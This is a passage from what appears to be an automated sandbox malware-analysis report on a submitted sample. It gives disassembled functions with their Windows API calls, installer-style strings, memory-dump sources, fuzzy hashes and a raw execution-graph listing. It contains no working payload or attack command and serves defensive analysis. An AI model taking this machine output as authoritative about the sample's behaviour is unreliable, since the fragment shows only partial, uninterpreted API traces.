                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                          APIs
                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                          • GetTickCount.KERNEL32 ref: 00403303
                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                          • String ID:
                                          • API String ID: 2102729457-0
                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                          • String ID:
                                          • API String ID: 2883127279-0
                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                          APIs
                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringlstrcmp
                                          • String ID: !N~
                                          • API String ID: 623250636-529124213
                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                          Execution Graph

                                          Execution Coverage:4.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:5%
                                          Total number of Nodes:1586
                                          Total number of Limit Nodes:29
14786 40a9c8 14776->14786 14840 411170 14776->14840 14777 40a94f 14778 419c6e 3 API calls 14777->14778 14779 40a95b 14778->14779 14780 40aa13 14783 40aa4d 14780->14783 14965 40b0b0 14780->14965 14788 40aa8c 14783->14788 14789 40b0b0 30 API calls 14783->14789 14803 40aaf5 14783->14803 14784 40a995 14784->14786 14787 40a9a2 14784->14787 14785 40aa3f 14785->14788 14986 40c480 14785->14986 14786->14780 14786->14783 14790 406640 3 API calls 14786->14790 14792 419c6e 3 API calls 14787->14792 14791 419c6e 3 API calls 14788->14791 14794 40aa77 14789->14794 14795 40aa03 14790->14795 14796 40aa97 14791->14796 14797 40a9ae 14792->14797 14794->14788 15021 40b490 14794->15021 14798 412920 26 API calls 14795->14798 14800 40aab9 14796->14800 14802 412920 26 API calls 14796->14802 14798->14780 14801 40aa85 14801->14788 14801->14803 14802->14800 14804 40abc2 14803->14804 14805 40ab0b 14803->14805 14806 40abd3 14804->14806 14807 40ab6b 14804->14807 14808 419c6e 3 API calls 14805->14808 14810 40aca5 14806->14810 14811 40abde 14806->14811 14813 412920 26 API calls 14807->14813 14809 40ab17 14808->14809 14814 412920 26 API calls 14810->14814 14812 412920 26 API calls 14811->14812 14815 40abff 14812->14815 14817 40aba1 14813->14817 14816 40acc6 14814->14816 14819 419c6e 3 API calls 14815->14819 14818 40ae08 14817->14818 14820 40ad8c 14817->14820 15038 406ae0 14818->15038 14821 40ac26 14819->14821 14826 412920 26 API calls 14820->14826 14823 40ac9c 14821->14823 14825 40ac40 14821->14825 14824 40ae14 14827 419c6e 3 API calls 14824->14827 15028 410130 14825->15028 14830 40adcb 14826->14830 14828 40ae27 14827->14828 14833 419c6e 3 API calls 14830->14833 14831 40ac51 14831->14823 14832 40ac7b 14831->14832 14834 412920 26 API calls 14831->14834 14832->14823 14835 40adee 14833->14835 14834->14832 14837 4022e9 14836->14837 14839 4022ee 14836->14839 15049 402300 14837->15049 14839->14776 14839->14777 14841 4114a9 14840->14841 14842 41118a 14840->14842 14843 411512 14841->14843 14844 4114ae 
14841->14844 15052 411100 14842->15052 14847 411640 14843->14847 14881 41151b 14843->14881 14845 413326 ___free_lc_time 7 API calls 14844->14845 14848 4114e2 14845->14848 14850 411892 14847->14850 14851 411649 14847->14851 14852 413326 ___free_lc_time 7 API calls 14848->14852 14849 4115ce 14856 411100 36 API calls 14849->14856 14866 4115e5 14849->14866 14853 411ad0 14850->14853 14861 41189c 14850->14861 14854 413274 12 API calls 14851->14854 14855 4114ee 14852->14855 14863 413326 ___free_lc_time 7 API calls 14853->14863 14869 4118a7 14853->14869 14858 41165e 14854->14858 14855->14784 14856->14866 14857 406640 CharToOemA MultiByteToWideChar MultiByteToWideChar 14857->14881 14860 41166a 14858->14860 14862 413274 12 API calls 14858->14862 14859 4111cd 14864 411df0 89 API calls 14859->14864 14860->14784 14865 413274 12 API calls 14861->14865 14861->14869 14868 41168f 14862->14868 14863->14869 14867 41123a 14864->14867 14872 4118f8 14865->14872 14866->14784 14870 411245 14867->14870 14871 4113b4 14867->14871 14873 41169b 14868->14873 14894 4116b9 14868->14894 14869->14784 14876 411278 14870->14876 14877 41124e 14870->14877 14879 411440 14871->14879 14880 4113c9 14871->14880 14875 411901 14872->14875 14890 41338f 6 API calls 14872->14890 14922 41194f 14872->14922 14878 413326 ___free_lc_time 7 API calls 14873->14878 14874 412920 26 API calls 14874->14881 14875->14784 14886 4112dd 14876->14886 14887 41127c 14876->14887 14882 413326 ___free_lc_time 7 API calls 14877->14882 14884 4116a6 14878->14884 14883 411368 14879->14883 14889 406640 3 API calls 14879->14889 14885 406640 3 API calls 14880->14885 14881->14849 14881->14857 14881->14874 14891 41125a 14882->14891 14883->14784 14884->14784 14892 4113da 14885->14892 15055 41c5bf CreateDirectoryA 14886->15055 14893 406640 3 API calls 14887->14893 14898 41145a 14889->14898 14890->14922 14899 413326 ___free_lc_time 7 API calls 14891->14899 14901 406640 3 API calls 14892->14901 14902 41128f 14893->14902 14895 4116fe 
GetFullPathNameA 14894->14895 14900 4117ab 14894->14900 14903 4116ef 14894->14903 14896 41171f 14895->14896 14917 4116f9 14895->14917 14904 412920 26 API calls 14896->14904 14897 4112e9 14897->14883 14911 406640 3 API calls 14897->14911 14905 412920 26 API calls 14898->14905 14906 411265 14899->14906 14900->14784 14907 4113ee 14901->14907 14908 412920 26 API calls 14902->14908 15058 413b4f 14903->15058 14910 411730 14904->14910 14913 41146a 14905->14913 14906->14784 14914 412920 26 API calls 14907->14914 14915 41129f 14908->14915 14910->14784 14916 411302 14911->14916 14912 41179e 14912->14900 14918 413326 ___free_lc_time 7 API calls 14912->14918 14925 413326 ___free_lc_time 7 API calls 14913->14925 14919 411401 14914->14919 14928 413326 ___free_lc_time 7 API calls 14915->14928 14920 406640 3 API calls 14916->14920 14917->14900 14917->14912 15064 411b10 GetDriveTypeA 14917->15064 14921 4117b9 14918->14921 14935 413326 ___free_lc_time 7 API calls 14919->14935 14923 411317 14920->14923 14926 413326 ___free_lc_time 7 API calls 14921->14926 14927 4119ae 14922->14927 14934 411df0 89 API calls 14922->14934 14930 412920 26 API calls 14923->14930 14932 41148a 14925->14932 14933 4117c5 14926->14933 14931 414564 24 API calls 14927->14931 14929 4112bf 14928->14929 14937 413326 ___free_lc_time 7 API calls 14929->14937 14938 41132a 14930->14938 14939 411aa5 14931->14939 14940 413326 ___free_lc_time 7 API calls 14932->14940 14933->14784 14941 4119dd 14934->14941 14936 411421 14935->14936 14942 413326 ___free_lc_time 7 API calls 14936->14942 14943 4112ca 14937->14943 14949 413326 ___free_lc_time 7 API calls 14938->14949 14939->14869 14946 413326 ___free_lc_time 7 API calls 14939->14946 14944 411496 14940->14944 14941->14927 14947 411a22 14941->14947 14948 411a04 14941->14948 14945 41142d 14942->14945 14943->14784 14944->14784 14945->14784 14950 411ab7 14946->14950 14952 41c5bf 2 API calls 14947->14952 14951 413326 ___free_lc_time 7 API calls 14948->14951 14953 411349 14949->14953 
14950->14784 14954 411a09 14951->14954 14955 411a27 14952->14955 14957 413326 ___free_lc_time 7 API calls 14953->14957 14954->14784 14955->14927 14956 411a2f 14955->14956 14958 406640 3 API calls 14956->14958 14959 411355 14957->14959 14960 411a3c 14958->14960 14959->14784 14961 412920 26 API calls 14960->14961 14962 411a4c 14961->14962 14963 413326 ___free_lc_time 7 API calls 14962->14963 14964 411a66 14963->14964 14964->14784 14966 40b1a5 14965->14966 14967 40b0c8 14965->14967 14971 41908b 2 API calls 14966->14971 14984 40b1e9 14966->14984 14968 41908b 2 API calls 14967->14968 14969 40b0d5 14968->14969 14970 41b5e5 6 API calls 14969->14970 14983 40b0ee 14970->14983 14973 40b1d1 14971->14973 14972 40b14e 15065 4068d0 14972->15065 14975 41b5e5 6 API calls 14973->14975 14974 40b149 14978 40b3a7 14974->14978 14979 412920 26 API calls 14974->14979 14975->14984 14977 41908b 2 API calls 14977->14984 14981 412920 26 API calls 14978->14981 14979->14978 14980 41b5e5 6 API calls 14980->14984 14982 40b3d2 14981->14982 14982->14785 14983->14972 14983->14974 14984->14972 14984->14974 14984->14977 14984->14980 14984->14983 14985 40b18e 14985->14785 14987 40c48c 14986->14987 14988 40c4e4 14986->14988 14994 412920 26 API calls 14987->14994 14989 40c50a 14988->14989 14990 40c7af 14988->14990 14992 412920 26 API calls 14989->14992 14991 40c6e9 14990->14991 14995 407860 51 API calls 14990->14995 14991->14783 14993 40c51b 14992->14993 14997 412920 26 API calls 14993->14997 14994->14988 14996 40c7d7 14995->14996 14996->14991 14998 412920 26 API calls 14996->14998 14999 40c543 14997->14999 15000 40c7f6 14998->15000 15001 412920 26 API calls 14999->15001 15000->14783 15002 40c579 15001->15002 15003 40c5fa 15002->15003 15004 40c59a 15002->15004 15006 412920 26 API calls 15003->15006 15005 412920 26 API calls 15004->15005 15010 40c5d0 15005->15010 15007 40c63b 15006->15007 15008 412920 26 API calls 15007->15008 15008->15010 15009 412920 26 API calls 15011 40c6b7 15009->15011 15010->15009 
15012 412920 26 API calls 15011->15012 15020 40c6da 15011->15020 15013 40c719 15012->15013 15015 412920 26 API calls 15013->15015 15014 412920 26 API calls 15014->14991 15016 40c741 15015->15016 15069 407860 15016->15069 15018 40c767 15019 412920 26 API calls 15018->15019 15019->15020 15020->14991 15020->15014 15022 40b503 15021->15022 15023 40b49d 15021->15023 15022->14801 15023->15022 15024 407860 51 API calls 15023->15024 15025 40b4ca 15024->15025 15025->15022 15026 412920 26 API calls 15025->15026 15027 40b4e5 15026->15027 15027->14801 15029 40fdc0 36 API calls 15028->15029 15030 410142 CreateFileA 15029->15030 15031 410165 15030->15031 15032 41016e 15030->15032 15031->14831 15033 40fce0 55 API calls 15032->15033 15034 410183 15032->15034 15033->15034 15035 41019a SetFileTime 15034->15035 15036 4101b1 15035->15036 15037 4101b4 CloseHandle 15035->15037 15036->15037 15037->14831 15039 406af7 15038->15039 15040 406b42 15039->15040 15041 406b07 15039->15041 15042 406b9f 15040->15042 15044 41908b 2 API calls 15040->15044 15043 412920 26 API calls 15041->15043 15042->14824 15045 406b24 15043->15045 15046 406b58 15044->15046 15045->14824 15047 41b5e5 6 API calls 15046->15047 15048 406b75 15047->15048 15048->14824 15050 413274 12 API calls 15049->15050 15051 40230a 15050->15051 15051->14839 15053 4101d0 36 API calls 15052->15053 15054 41110a 15053->15054 15054->14859 15056 41c5cf GetLastError 15055->15056 15057 41c5d7 15055->15057 15056->15057 15057->14897 15060 413b7c 15058->15060 15063 413b5f 15058->15063 15059 413b9a 15062 41918f 9 API calls 15059->15062 15059->15063 15060->15059 15061 41338f 6 API calls 15060->15061 15061->15059 15062->15063 15063->14917 15064->14912 15067 4068e4 15065->15067 15068 406978 15065->15068 15066 41b5e5 6 API calls 15066->15067 15067->15066 15067->15068 15068->14985 15070 407873 15069->15070 15071 40787b 15069->15071 15070->15018 15072 407ce7 15071->15072 15073 407c61 15071->15073 15074 407a5d 15071->15074 15101 40788f 15071->15101 15106 
407c16 15071->15106 15072->15018 15075 407c70 15073->15075 15079 413326 ___free_lc_time 7 API calls 15073->15079 15081 412920 26 API calls 15074->15081 15083 407a79 15074->15083 15080 413274 12 API calls 15075->15080 15076 407a18 15076->15018 15077 406ae0 30 API calls 15078 407c54 15077->15078 15078->15018 15079->15075 15082 407c79 15080->15082 15081->15083 15085 407ce0 15082->15085 15086 407c85 15082->15086 15084 4068d0 6 API calls 15083->15084 15091 407ab8 15084->15091 15087 4068d0 6 API calls 15085->15087 15088 412920 26 API calls 15086->15088 15087->15072 15090 407c9a 15088->15090 15089 4068d0 6 API calls 15089->15101 15093 406ae0 30 API calls 15090->15093 15091->15076 15092 407b09 OemToCharA 15091->15092 15100 407b1f 15091->15100 15092->15100 15094 407cd3 15093->15094 15094->15018 15095 407940 OemToCharA 15098 40794d CharToOemA 15095->15098 15096 413755 2 API calls 15096->15100 15097 407bb7 15097->15072 15099 406640 3 API calls 15097->15099 15098->15101 15102 407c06 15099->15102 15100->15096 15100->15097 15104 41338f 6 API calls 15100->15104 15105 413b4f 15 API calls 15100->15105 15101->15076 15101->15089 15101->15095 15101->15098 15103 412920 26 API calls 